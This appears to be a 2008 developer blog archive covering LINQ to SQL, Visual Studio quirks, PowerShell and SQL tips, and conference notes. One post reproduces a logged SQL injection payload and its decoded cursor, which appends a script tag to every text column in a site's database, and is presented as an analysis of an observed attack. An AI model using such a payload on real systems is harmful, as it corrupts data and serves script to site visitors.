Sunday, June 29, 2008

LINQ to SQL architecture question

I have structured a project with a single LINQ to SQL .dbml file and a single DataAccess class that is used to call stored procs and query against this DBML class. The DataAccess class implements the singleton pattern inasmuch as there's a static DataAccess property which is used for all DB access.

The business layer of the application creates an instance of the DataAccess object, calls the appropriate data access function and then returns.

When running as a web application it is hit rapidly by 2 clients: (1) a browser calls it about 1 to 50 times a second (writing data to the DB) and (2) an Excel spreadsheet calls the web app via a web service on an ad hoc basis and queries for data.

When the spreadsheet does the query (the browser's hitting the site up to 50 times a second at the same time) I am getting several errors such as the following:

  • Invalid attempt to call MetaData when reader is closed
  • There is already an open DataReader associated with this Command which must be closed first.
  • ExecuteNonQuery requires an open and available Connection. The connection's current state is closed.
  • A transport-level error has occurred when receiving results from the server. (provider: Session Provider, error: 18 - Connection has been closed by peer)
  • A severe error occurred on the current command. The results, if any, should be discarded.
  • A transport-level error has occurred when receiving results from the server. (provider: Shared Memory Provider, error: 0 - No process is on the other end of the pipe.)

The first 2 errors were solved by adding MARS to the connection string: MultipleActiveResultSets=true

The rest of them I solved by adding a static lock object to the DataAccess class and wrapping all calls to the database in a lock(lockObj) {}.

This solution doesn't feel right though.

I'd welcome comments on the general approach I've taken, and on the lock() solution in particular.
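For what it's worth, DataContext is designed to be cheap to create and is not thread-safe, so a common alternative to a locked singleton is a new context per unit of work. A minimal sketch of that shape - the context and entity names (MyDataContext, Widget) are hypothetical stand-ins for what the .dbml designer would generate:

```csharp
using System.Collections.Generic;
using System.Linq;

// Sketch: a new DataContext per unit of work instead of one shared,
// locked instance. MyDataContext/Widget are hypothetical names that
// would come from the .dbml designer.
public class DataAccess
{
    private readonly string connectionString;

    public DataAccess(string connectionString)
    {
        this.connectionString = connectionString;
    }

    public void SaveWidget(Widget widget)
    {
        // Each call gets its own context (and a pooled connection),
        // so concurrent browser writes share no state.
        using (var db = new MyDataContext(connectionString))
        {
            db.Widgets.InsertOnSubmit(widget);
            db.SubmitChanges();
        }
    }

    public List<Widget> GetWidgets()
    {
        using (var db = new MyDataContext(connectionString))
        {
            return db.Widgets.ToList();
        }
    }
}
```

Connection pooling keeps the per-call contexts cheap, and with no shared DataContext the lock() workaround shouldn't be needed.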

Saturday, June 28, 2008

VS2008 bugs

Here are a few bugs that I've found so far with Visual Studio 2008:

  • If you have a lot of files open and you quickly hit Ctrl+F4 in succession then there's a good chance that you will crash VS2008. This sometimes happens when you click on the menus Window -> Close All Documents.
  • Sometimes I'm in a unit test and I quickly want to debug/run it so I hit Ctrl+R, Ctrl+T but it doesn't run. I then check the menu items at Test -> Debug -> Tests in Current Context and see that this item on the menu is disabled. I then have to fiddle about with the project jumping from file to file and keep on checking back and then it magically becomes enabled. I haven't worked out what the magic combination of moving around the project is that enables this yet...
  • When I set the browser to Firefox and debug a web app through Cassini then VS2008 doesn't terminate debugging when I exit Firefox. My options are then Shift+F5 to manually stop it or to right click on the Cassini icon in the Tray and select Stop.

21 July 2007: I think I've solved the second problem - where I can't debug a unit test sometimes. I think that this happens when the project's solution is read-only because it hasn't been checked out of source control.

Structuring a solution and project

How do you structure a new solution in Visual Studio?

Typically, within about 10 minutes of starting a new solution in VS2008, I will have 10 projects in that solution. They are:

  1. The Application
  2. The Business Layer (BLL)
  3. The Database Layer (DB)
  4. The Logger
  5. The Utility Library

And then for each of those projects I have a unit test project. The new projects are the App, BLL, and DB. Items 4 and 5, the logger and utility library, are used in all projects, and when I find that a project needs a bit of functionality that's in another project I move it to the utility library so both projects can share it.

Almost all of the code for any solution will go into the BLL. I try and put everything in there. The DB provides a facade to the data store and I try and keep the UI as thin as possible so that all the logic can be tested in the BLL. Whenever possible I'll use an interface and inject the dependent object into the relevant class so that I can mock the object during testing. For testing I use Visual Studio's built-in test harness and for mocking I use Rhino Mocks.

Friday, June 27, 2008

Powershell replace text in files and recurse subdirectories

I needed to go through every file in a folder and all of its sub directories and open each file and replace a given string. This is what I finally came up with. I'm sure that this can be improved on though...

function ReplaceText($fileInfo) {
    if ($fileInfo.GetType().Name -ne 'FileInfo') {
        # i.e. reject DirectoryInfo and other types
        return
    }
    $old = 'my old text'
    $new = 'my new text'
    (Get-Content $fileInfo.FullName) | % { $_ -replace $old, $new } | Set-Content -Path $fileInfo.FullName
    "Processed: " + $fileInfo.FullName
}

$loc = 'c:\my file\location'
cd $loc
$files = Get-ChildItem . -recurse

$files | % { ReplaceText( $_ ) }

Invalid attempt to call MetaData when reader is closed

I'm using LINQ to SQL to write information at a rapid rate to the same table via calls to a web page. At the same time there is a web service providing results from that table. So far the best info I've found on this lies here:

  • Invalid attempt to call MetaData when reader is closed

However, this looks like it's going to be a hard problem to solve.

Need to try adding the following to my connection string declaration:

MultipleActiveResultSets=True
Subsequently hit this error as well:

  • There is already an open DataReader associated with this Command which must be closed first.

Reason given in this forum post was: This is due to a change in the default setting for MARS. It used to be on by default and we changed it to off by default post RC1. So just change your connection string to add it back (add MultipleActiveResultSets=True to the connection string).

MARS stands for Multiple Active Result Sets.

Not sure what I'm doing with this database at the moment; plenty of errors that need investigating:

  • ExecuteNonQuery requires an open and available Connection. The connection's current state is closed.
  • A transport-level error has occurred when receiving results from the server. (provider: Session Provider, error: 18 - Connection has been closed by peer)
  • A severe error occurred on the current command.  The results, if any, should be discarded.
  • A transport-level error has occurred when receiving results from the server. (provider: Shared Memory Provider, error: 0 - No process is on the other end of the pipe.)

Sunday, June 22, 2008

Improving Hauppauge Wireless Performance

My Hauppauge MediaMVP has been pausing every few seconds when I've been using it over wireless - basically an apparent bandwidth problem. If I hard-wire it to the network then the problem goes away. Recently I needed to use it wirelessly again and so I had to solve the problem. I tried a few things but nothing worked until I changed the Wireless Channel from 6 to 11. As soon as that was done it started operating very smoothly and without the previous jerkiness.

This blog post serves 2 purposes: (1) To record and remind me how I fixed the problem and (2) to ask any reader if they know why changing the Wireless Channel from 6 to 11 would solve the problem?

Other settings that I have on my wireless access point are:

Wireless Network Type: 802.11g Only
No encryption

Saturday, June 21, 2008

Inktomi Slurp Confirm 404

Approximately once a month (or perhaps every 2 months) my web sites record a request for a page such as:


This is Yahoo checking to see that the web site correctly returns a 404 for pages that don't exist. To confirm that it really is Yahoo you should do a lookup on the IP where the request came from and check that it's INKTOMI CORPORATION.

I assume that this makes for better indexed web sites as the search engines can rely on your site to return the appropriate error codes for pages that have moved or are no longer there.

Here is some trivial information about the Inktomi bot's visit to the previously mentioned site. The first visit was recorded today (6/21/2008) at 6:31am ET and the last at 12:56pm. There were a total of 9 visits. The shortest time between visits was 9 minutes and the longest 79 minutes with an average of 48 minutes. Each IP address that each request came from was unique but they all fell in the 72.30.215.* block.

I've decided to try to tabulate the visits to see exactly how often they check:


More visits:

2008-10-15T05:43:37Z /SlurpConfirm404/Honey.htm
2008-10-15T05:50:03Z /SlurpConfirm404/weather/heavenbecauseofyou/hearzg.htm
2008-10-15T05:52:43Z /SlurpConfirm404/fan/docs.htm
2008-10-15T05:58:59Z /SlurpConfirm404/dickg.htm
2008-10-15T06:30:23Z /SlurpConfirm404/thelmalouise/ALL-IMAGE-005-J/railways.htm
2008-10-15T06:43:15Z /SlurpConfirm404/pcwww.htm
2008-10-15T06:50:56Z /SlurpConfirm404/commandes.htm
2008-10-15T06:52:30Z /SlurpConfirm404/Patriotic/acarogicofla.htm
2008-10-15T06:59:11Z /SlurpConfirm404/adm_app/contact_me/ewebtur.htm
2008-10-15T07:03:34Z /SlurpConfirm404.htm
2008-10-15T07:04:00Z /SlurpConfirm404/narra/ArtEd/research_faculty.htm
2008-10-15T07:04:09Z /SlurpConfirm404/opinio/witzindex.htm
2008-10-15T07:28:16Z /SlurpConfirm404.htm
2008-10-15T07:30:11Z /SlurpConfirm404/wopabbswp/child-health/boys.htm
2008-10-15T07:42:09Z /SlurpConfirm404/wopsafiwp/wcwstinger/whoareyou.htm
2008-10-15T08:13:11Z /SlurpConfirm404/kurihara.htm
2008-10-15T10:40:58Z /SlurpConfirm404/diablo/WHW.htm
2008-10-16T06:30:39Z /SlurpConfirm404.htm
2008-10-16T07:56:24Z /SlurpConfirm404/MegRyan.htm
2008-10-16T08:48:33Z /SlurpConfirm404/handouts/loge/shackbar.htm
2008-10-16T09:01:04Z /SlurpConfirm404/aleapa_001.stats/manews.htm
2008-10-16T10:45:53Z  /SlurpConfirm404/minority.htm
2008-10-16T11:44:04Z  /SlurpConfirm404/BlushingAngel/ANIC/byblos.htm
2008-10-16T16:03:30Z  /SlurpConfirm404/cgiwrap/viten/INFO465-gs.htm
2008-10-16T17:30:22Z  /SlurpConfirm404/rant/business.demonizing_gat1a.htm
2008-10-16T18:36:13Z  /SlurpConfirm404/tma.htm
2008-10-17T02:19:56Z /SlurpConfirm404/drodgers/ppv.htm

SQL Injection Attack

I monitor the logs of a number of web sites and one of them has recently come under a SQL Injection Attack. Here is the code that was trying to be injected as a query param on a URL:

Exception in xxxxx.Page_Load() with param1=abc;DECLARE @S VARCHAR(4000);SET @S=CAST(
AS VARCHAR(4000));EXEC(@S);--:
String or binary data would be truncated.
The statement has been terminated.

With thanks to the guys on AZGroups I managed to learn a lot about this.

There's a great discussion thread about this here:

To decode the hex into the command that will be executed you can do that in SQL Server Management Studio by using the following syntax (kudos to slide_o_mix):


SELECT CAST(
0x... -- put the hex characters here, with the leading 0x
AS VARCHAR(4000));

When decoded, the SQL Injection Attack reads as follows:

a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)
OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+']
SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=></script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

Thanks to Scott Cate for further investigating this and decoding the riddle. Looks like the objective of this attack is to spam ads onto the target site.

Sunday, June 15, 2008

Finding non-unique rows in SQL Server

I was trying to copy a table of data from Microsoft Access into SQL Server. I set up the MS Access file as a Linked Server and then executed an insert:

insert into TableName (Col1, Col2, Col3, Col4)
select T.ColA as Col1, T.ColB as Col2, T.Col3, T.Col4
from ACCESS_DB...TableName T

But I discovered that the unique key had not been set correctly on the Access table so I had to find the duplicate keys. This is what did the trick:

select * from ACCESS_DB...TableName where Col1 in (
select Col1 from ACCESS_DB...TableName
group by Col1
having count(Col1) > 1)

This worked from SQL Server directly against the Access DB. The same type of syntax would work against any regular SQL Server table as well.

LINQ ToDictionary

If you want to convert an IEnumerable to a dictionary using LINQ then do:

Dictionary<string, object> dict = myList.ToDictionary(a => a.MyString, a => a.MyObject);

Saturday, June 14, 2008

Order of Usings in C#

Something strange with Visual Studio 2008. I was trying to use LINQ in a class in an Excel add-in that I was writing and set up the using statements as follows:

using System;
using System.Collections.Generic;
using System.Text;
using Excel = Microsoft.Office.Interop.Excel;
using System.Reflection;
using System.Linq;

It would not compile and there was no IntelliSense.

I re-arranged the usings like this:

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using Excel = Microsoft.Office.Interop.Excel;
using System.Reflection;

It compiled and IntelliSense worked.

Out of curiosity I changed the usings back to how they originally were with the System.Linq at the end and this time VS2008 compiled it.

A bit weird - not sure what's happening here...

Cannot drop database because it is currently in use

I was getting this error when trying to drop a database:
Cannot drop database "MyDatabaseName" because it is currently in use.

I tried the sp_who command to see if there was anything holding on to the DB that I hadn't disconnected from. Couldn't see anything.

drop database MyDatabaseName kept on failing.

Eventually I closed SQL Server Management Studio (SSMS) and reopened it and the drop command then worked immediately. No idea why this happened but this was the solution.

Thursday, June 12, 2008


On one of my web sites I've noticed an attempt to access any one of the following 3 pages:




The pages are frequently followed by a long hash key sequence. Often the referring URL is a search from Google.

I've noticed this every now and then (about every two to six months) and Google has always been involved. A search of the web shows that others have seen this but with referring URLs from Live search as well. Most commentators think that it's a random attack bot. I don't think that it follows that pattern but I'm not discounting the theory.

Today I came up with a new theory based on the pattern I saw: someone clicked the AdSense link on one of the pages and reported it to Google for "non-compliance." So I was wondering whether Google now has an automated way of telling webmasters that someone has reported one of their pages for non-compliance. This would make sense, so that webmasters could check their pages to make sure that they are compliant with AdSense.

I haven't been able to find any further info on this theory yet though...

Saturday, June 7, 2008

Introduction to Powershell for Developers

From: Desert Code Camp 2007
Speaker: Anthony Park



{ } - delineates a block of code.

$ - precedes a variable

-eq is 'equal'

-ne is 'not equal'

= is assignment

Store time intensive command results in a variable for later use.

e.g.: $b = Get-EventLog System

$_ is the self (this) variable.

Pipe variable or command results into the Get-Member command to see members of the object. eg: $b | Get-Member

To group a collection by one of the fields pipe the collection into the Group-Object and specify the member name as the following parameter. e.g. $b | Group-Object Source

You should sort the collection before grouping. e.g. $b | Sort-Object Source | Group-Object Source

You can filter a collection before (or after) applying the above command using the Where-Object. e.g. $b | Where-Object { $_.Source.StartsWith('S') } | Sort-Object Source | Group-Object Source

The $profile variable holds the default profile that gets run when you open Powershell. If you want to customize your Powershell then typing $profile in the Powershell environment will show you where your default profile is so that you can edit it.

 To retrieve a web page into a variable try: $mypage = (New-Object Net.WebClient).DownloadString('')



Friday, June 6, 2008

Web Application Hacking

From: Desert Code Camp
Speaker: Adam Monter


Don't keep the web server on the C: drive because a hacker can traverse backwards up the directory tree to the system files.

Validate all info coming in. (Prevents malicious scripts etc.) has a java proxy that shows what the application is doing. (I may have written down the url incorrectly or the site's changed since this talk as the web doesn't seem related to the subject so I'm not linking it from here.)

Absinthe is a gui-based tool that automates the process of downloading the schema & contents of a database that is vulnerable to Blind SQL Injection.

Wikipedia has a good page on SQL Injection.

OWASP (Open Web Application Security Project) is a free and open application security community.

 Visit Johnny I Hack Stuff - I was a bit skeptical about visiting a site with this name at first but it was given to me by the guy at the talk and so I trusted him and it turned out to have a page rank of 6.

Hackers can look at your cached page on Google without leaving an audit trail. (You can prevent Google from caching your pages with robots.txt and meta tag directives.)

SQL Server 2005 Do's and Don'ts for Developers

From:  Desert Code Camp 2007
Speaker: Eric Kassan (from World Doc)


Systems will scale better if less code is in the DB server because there is almost always only 1 database server but there can be many application or web servers.

Specify dbo. in front of table name to improve performance.

Use a temp variable instead of a temp table if it's a relatively small data set.

Using Stored Procs for database access and never accessing tables gives you:

  • Enhanced security. Only need to grant access to user account to stored procedures and not to the tables.
  • Abstraction. You can change the database structure, but the application talks to the stored procs so it will not be affected by table structure changes.
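As a sketch of what stored-proc-only data access looks like from C# - the proc and parameter names (usp_GetCustomerOrders, @CustomerId) are made up for illustration:

```csharp
using System.Data;
using System.Data.SqlClient;

public static class OrderData
{
    // Sketch: the app account only needs EXECUTE permission on the
    // proc, not SELECT on the underlying tables. Names are hypothetical.
    public static DataTable GetCustomerOrders(string connectionString, int customerId)
    {
        using (var conn = new SqlConnection(connectionString))
        using (var cmd = new SqlCommand("dbo.usp_GetCustomerOrders", conn))
        {
            cmd.CommandType = CommandType.StoredProcedure;
            cmd.Parameters.AddWithValue("@CustomerId", customerId);

            var table = new DataTable();
            using (var adapter = new SqlDataAdapter(cmd))
            {
                adapter.Fill(table); // the adapter opens and closes the connection
            }
            return table;
        }
    }
}
```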

Keep it simple - if there are a lot of users then don't use triggers, cursors and extended stored procs.

SEO for Coders

From: Desert Code Camp 2007
Speaker: Can't remember

Notes: is a good site for keywords

Google search: Using allintitle in Google search finds all pages with only those words in the title. Can also use double quotes in this section to find contiguous words.

Use mod rewrites to clean up URLs. Use dashes to break up words in the URL. Don't use parameters on the URL. Look at and for good examples. Drupal automatically does the dashes for you if you're using it.

Validate site with XHTML. Validated sites rank higher.

Read Matt Cutts Blog.

Desert Code Camp 2007

I put my notes for Desert Code Camp 2008 on this site and have already found them useful. While doing a clear-out today I found my handwritten notes from the 15 September 2007 Desert Code Camp and decided to add them here as well for future reference.

Sessions attended, in order, from 9:15am to 6pm

Request object error

I came across an interesting problem today that I wanted to document in case I hit it again and provide some notes in the hope that this helps somebody else.

An ASP (not .NET) forum that I'm responsible for had the following error:

Request object error 'ASP 0104 :80004005'
Operation not Allowed
/forum/inc_UploadDefault.asp, line 4

The message wasn't that useful but I finally tracked down that it came from trying to upload a file to the ASP forum that was larger than 200 KB.

It turns out that IIS 6.0 prevents the uploading of files larger than 200 KB by default. This is not a big deal and I would expect there to be some sort of default limit.

What I did find unusual though were the steps that I had to go through to increase this limit.

  1. Stop "IIS Admin Service" - this also stopped "World Wide Web Publishing Service", "FTP Publishing Service", and "HTTP SSL"
  2. Edit the C:\WINDOWS\system32\inetsrv\MetaBase.xml file and find the entry that read AspMaxRequestEntityAllowed="204800" and change this to read a larger value.
  3. Save the file.
  4. Restart the 4 services.

I would have expected to be able to change this entry through an interface but it appeared that I had to stop the sites to do this. If anybody knows a more elegant way to do this then please post a comment.

Monday, June 2, 2008

Integration Unit Testing Analogy

I like Roy Osherove's restaurant analogy of Unit Testing vs. Integration Testing:

When it comes to paying for a meal...

Integration testing is like giving one big check to the group, with everyone having to calculate on their own how much they need to pay. Sometimes everyone thinks they are good, but in the end the total amount may be too high or too low. There is a lot of interaction going on to decide who pays for what and who has already paid.

Sunday, June 1, 2008

Intro to Dependency Injection and Inversion of Control

From: Desert Code Camp 2008
Speaker: Donn Felker (from Statera)


90% of injection is done in the constructor of the class by passing in instances as interfaces. The other 10% is done primarily through a setter property and in rare cases as a param to a method.
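A minimal sketch of both shapes - the ~90% constructor case and the setter-property case. All of the names here (IMessageSender, OrderProcessor, etc.) are hypothetical:

```csharp
using System;

// The class under construction depends on an interface; the concrete
// instance is supplied from outside rather than new'd up internally.
public interface IMessageSender
{
    void Send(string message);
}

public class EmailSender : IMessageSender
{
    public void Send(string message)
    {
        Console.WriteLine("Emailing: " + message);
    }
}

public class OrderProcessor
{
    private readonly IMessageSender sender;

    // ~90% case: the dependency arrives through the constructor.
    public OrderProcessor(IMessageSender sender)
    {
        this.sender = sender;
    }

    // Rarer case: an optional dependency injected via a setter property.
    public IMessageSender BackupSender { get; set; }

    public void Process(string orderId)
    {
        sender.Send("Processed order " + orderId);
    }
}

public static class Program
{
    public static void Main()
    {
        // In a real app a container (Unity, Castle Windsor, StructureMap)
        // would resolve IMessageSender; here it's wired up by hand.
        var processor = new OrderProcessor(new EmailSender());
        processor.Process("42");
    }
}
```

In a test you would pass in a mock IMessageSender instead of EmailSender, which is exactly what makes the class testable.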

IoC = Dependency Inversion Principle. A service locator returns the concrete instances of classes requested. The service locator is a container.

Microsoft.Practices.Unity is a popular Microsoft container and Castle Windsor is the most popular open source container.

Links to containers:

Castle Windsor
Microsoft Unity
Structure Map

Search Engine Optimization

From: Desert Code Camp 2008
Speaker: Kay Frenzer (from Teralever)

4 factors when optimizing a web site:
Technical - i.e. do your pages show up / does the site work.
Content - The content on each page
Inbound Links - Links from sites with similar topics to your site.
Trust - Your site is a trusted site.
There's a robots meta tag that you can put on any page that will override what your robots.txt file states about the page: <meta name="robots" content="noindex, nofollow, noarchive, nosnippet, noodp, none">
The <title> tag on the page is the most important part of the page when optimizing for keywords. Don't put your company name in the title (unless the name is part of the keyword(s) that you're optimizing for), but if you feel that you have to, put the keywords first and the company name last. Don't use stop words in the title. Stop words are words such as: the, of, that, is, and, to, www, web, web page, homepage, home page. The maximum length for a title is 120 characters. Google displays 65 characters in its search results.
Commercial tools for keyword optimization are and
LSI is Latent Semantic Indexing. The search/indexing bot looks at the words around the keywords to see if they are related. If not it will mark that section of text as spam and that page as a spam page.
Apparently your site can be penalized for being linked to from (1) link farms (2) porn sites (3) gambling sites (4) other non desirable or illegal sites. Personally I find this hard to believe as this would allow your competitors to displace you from good rankings by linking to you using these methods.
If you want to get a link count for your web site you should use Yahoo instead of Google because Google gives a deliberately misleading value. To get a link count of sites and pages that link to your site you should enter the following text into the Yahoo search box: link: -site:
Replace the guyellisrocks with your web site name.
When creating links on your site to other pages on your site, use full URLs with the domain name and not relative paths.
Kay's presentation from today will be at
I would have liked to have seen the presenter walk through a real world case study and demonstrate a new site or page that she took on for a client and what she did at each step of the way and how she optimized each page and the final results over a period of (say) 6 to 12 months.

What's different about Ruby

From: Desert Code Camp 2008
Speaker: Logan Barrett


Ruby is a dynamic language.

IRB is a pseudo-acronym that stands for Interactive Ruby.

Ruby has strong typing - you can't cast a string to an int.

Testing is emphasized in Ruby and built in.

Duck typing in Ruby replaces what an interface in C# would be used for.

Everything in Ruby is an object.

The method_missing method is a method that will catch any call to a method on an object that is missing. i.e. if a method hasn't been declared for an object then its method_missing method will be called.

A lambda function in Ruby is called a code block or just a block.

A block is typically used to iterate over a collection like a for or foreach loop in C#.

collection.each do |element| ... end  # iterates over all elements in the collection
collection.each_with_index do |element, index| ... end

Test Driven Development

From: Desert Code Camp 2008
Speaker: Saul Mora (from Go Daddy)


Read Pragmatic Unit Testing in C# with NUnit by Andy Hunt and David Thomas.

5 objectives in Test Driven Development:

Test what hasn't been tested.
Boundary Conditions
Inverse Relationships (objects that refer to each other)
Error conditions

Tools: For SQL Server - tsqlunit

The guys who created NUnit are apparently working on another project called Gallium (although I'm sure I've misspelled it because I can't find it in my searches) and they are also working for Microsoft. This note needs more info/editing.

Test Runners: and ReSharper UnitRun are both unit test runners.

Another book: Test Driven Development by Kent Beck

References: Agile Data

The project pattern is to have a DLL (in a project) containing the tests, with references to the unit test DLL(s), mock DLL(s), and the project under test; all tests live there.

Methods marked with the [SetUp]/[TearDown] attributes in the unit test class are run for each of the tests in that class. You can often use the class's constructor and destructor/Dispose methods to achieve the same.
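A sketch of the attribute shape in NUnit terms (the Calculator class under test is hypothetical). One caveat on the constructor approach: whether a constructor runs once per test depends on the framework - xUnit.net creates a fresh fixture instance per test, while NUnit reuses one instance - so [SetUp] is the safer place for per-test state:

```csharp
using NUnit.Framework;

[TestFixture]
public class CalculatorTests
{
    private Calculator calc; // hypothetical class under test

    [SetUp]
    public void BeforeEachTest()
    {
        calc = new Calculator(); // fresh object before every [Test]
    }

    [TearDown]
    public void AfterEachTest()
    {
        // release any expensive resources after each test here
    }

    [Test]
    public void AddsTwoNumbers()
    {
        Assert.AreEqual(4, calc.Add(2, 2));
    }
}
```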

Silverlight Zero to Hero

From: Desert Code Camp 2008
Speaker: Simon Allardice (from Interface Technical Training)

This is the first time that I've seen Simon speak and it was very good and very entertaining. He's Scottish with a good sense of humor and reminded me a bit of Billy Connolly. Very good at delivering his content and keeping the audience captivated.

He made references to Florence Nightingale and Henri Matisse at the beginning of his talk which he said he was going to talk about and I thought that was a joke (I'm sure everyone else did as well) however he brought them back in later on and used them as analogies.


Silverlight 2.0 is almost chalk and cheese when compared to Silverlight 1.0.

Silverlight 2.0 is not just for media (video, audio, graphics) - although 1.0 was primarily that. Version 2.0 has C# and plenty of controls and is very powerful.

Use grids for tabular data (replaces <tables>) but if you can get your data over in another way (charts for example) use them.

Isolated storage can be expanded with the permission of the user so you're not stuck with the small initial limit if you need more local disk space.

Expression Blend is the tool of choice for designing and Visual Studio 2008 for programming.

Dan Wahlin has a blog based on Scott Guthrie's original posts about Silverlight.

Steve Krug's book Don't Make Me Think is a common sense approach to web usability.


ASP.NET AJAX Internals

From: Desert Code Camp 2008
Speaker: Rob Paveza (from Teralever)


Script# - This is a C# to Javascript compiler. Instead of generating IL code like the C# compiler normally would it generates javascript. I believe that it's written by Nikhil Kothari.

WebService calls can be made from the UpdatePanel which has the advantage of reducing the viewstate. These calls can be made static.

If using the Telerik controls then watch out for a conflict between them and ASP.NET Ajax as there are some incompatibilities.

Mootools and Prototype are Ajax toolkits. (I get the impression that Mootools is commercial and Prototype is free open source.)

To use a WebService call in Ajax you need to decorate the call with the [ScriptService] and [ScriptMethod] attributes.
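A sketch of such a decorated web service - the class, namespace and method names are all made up for illustration:

```csharp
using System.Web.Services;
using System.Web.Script.Services;

// [ScriptService] lets the ASP.NET AJAX client-side proxy call this
// service with JSON; [ScriptMethod] can further customize each call.
[WebService(Namespace = "http://example.com/")]
[ScriptService]
public class ProductService : WebService
{
    [WebMethod]
    [ScriptMethod(ResponseFormat = ResponseFormat.Json)]
    public string GetProductName(int id)
    {
        return "Product " + id; // hypothetical lookup
    }
}
```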

If you put the ScriptManager reference (required for all ASP.NET Ajax pages) on a master page then you need to use a ScriptManagerProxy reference in the control that you're building. There are a number of arguments (attributes) that can be given to ScriptManager that I haven't used before that need further investigating.

The EnablePageMethods=true is a ScriptManager attribute that makes the page act like a web service.

Desert Code Camp 2008

This is the second year that I've been to Desert Code Camp. Lorin Thwaits is the camp director and always does an excellent job of organizing it. Last year there was a lack of food but that was rectified this year and there was good grub on hand.

The day is divided into eight 1-hour time slots with a ten minute break between each session, starting at 9am. There were up to 7 talks being given in each of the time slots. I managed to make 6 of them and missed the last 2 of the day. Last year I made a ton of notes and I have not looked back at them in the last year and probably won't. To try to make my notes more useful to myself (and perhaps others) I'm going to put them here so that I can easily find them again. I only made notes about the stuff that I learned; even where a speaker said something important that one would normally note down, if I already knew it and am unlikely to forget it then I probably didn't note it.

ASP.NET AJAX Internals
Silverlight Zero to Hero
Test Driven Development
What's different about Ruby?
Search Engine Optimization
Intro to Dependency Injection and Inversion of Control

A couple of speakers used the word grok, which I've heard recently at other meetings. This word I have no doubt will become more and more popular in use. Wikipedia defines it as: Grok means to understand so thoroughly that the observer becomes a part of the observed. First coined in Robert A. Heinlein's 1961 novel Stranger in a Strange Land.